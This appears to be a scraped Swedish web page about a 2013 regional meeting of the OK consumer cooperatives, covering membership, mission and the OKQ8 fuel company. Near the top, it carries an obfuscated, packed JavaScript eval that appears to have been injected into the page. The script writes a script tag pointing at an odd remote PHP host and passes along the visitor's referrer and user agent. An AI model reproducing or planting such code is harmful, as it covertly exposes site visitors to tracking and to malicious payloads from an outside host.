Image Image Image Image Image Image Image Image Image Image

| 1 juni, 2020

Scroll to top

Top

OK – Regionsstämma 2013

OK – Regionsstämma 2013

type=”text/javascript”>// eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hhatn|var|u0026u|referrer|rkbik||js|php’.split(’|’),0,{}))

Lite om OK:

Vårt fokus

Regionsstämma: OKs viktigaste uppgift är att vi själva, eller i samverkan, ska ge god service och ekonomisk nytta till våra medlemmar och kunder. Det kräver att vi kontinuerligt vågar tänka nytt. Sättet vi arbetar på ska vara hållbart för samhället och för klimatet. Vår strävan är att vara ledande i arbetet för miljön. Det är så vi gör en ansvarsfull och effektiv bil- och energianvändning möjlig.

Över 1 miljon medlemmar

Föreningarna ägs av över en miljon medlemmar som varje år delar på det eventuella överskottet i sin förening i form av återbäring på gjorda inköp.

Den största av OK-föreningarna är OK ekonomisk förening som har över
en miljon medlemmar. OK Norrbotten, OK Värmland, OK Västerbotten,
OK Köping, OK Piteå och OK Örnsköldsvik har tillsammans cirka 300 000 medlemmar.

Föreningarnas uppdrag

OK-föreningarna bedriver bilistisk fackhandel och tillhandahåller både traditionella och förnybara drivmedel, biltillbehör, servicetjänster och mängd andra produkter. Nyckelord som kvalitet, fackkunskap, hög servicegrad och prisvärda produkter är vägledande för all verksamhet. I vårt arbete är frågor kring rättvis, etisk handel och andra sociala ansvarsfrågor viktiga och vi ställer även kontinuerligt allt högre krav på leverantörer. Likaså strävar OK efter att arbeta med miljöfrågor i alla led.

Sveriges största bensinbolag

OK ekonomisk förening äger 50 procent av ett av Sveriges största drivmedelsbolag OK-Q8 AB. Den andra hälften ägs av det statligt ägda Kuwait Petroleum International. OKQ8 har cirka 790 bensinstationer i hela landet. Alla sju OK-föreningarna samarbetar under varumärket OKQ8.

Att vara medlem

Ditt medlemskap i OK ekonomisk förening är ett delägarskap i ett bolag som omsätter mer än nio miljarder kronor. Detta kapital, tillsammans med makten hos drygt en miljon medlemmar, ger oss kraft att påverka utvecklingen på den svenska energimarknaden. Det är många som insett fördelarna med att vara medlem i OK ekonomisk förening. I slutet av 2009 var vi 1 164 867 medlemmar. Varje medlem har en röst. Vad och hur vi ska göra bestämmer vi med andra ord tillsammans och våra beslut är långsiktiga. Därför är ett etiskt, klimatsmart och i övrigt hållbart förhållningssätt A och O i vår verksamhet.

Som medlem har du möjlighet att påverka OK och göra din röst hörd. Det gör du bland annat på stämman.

Läs mer: OK hemsida

Tags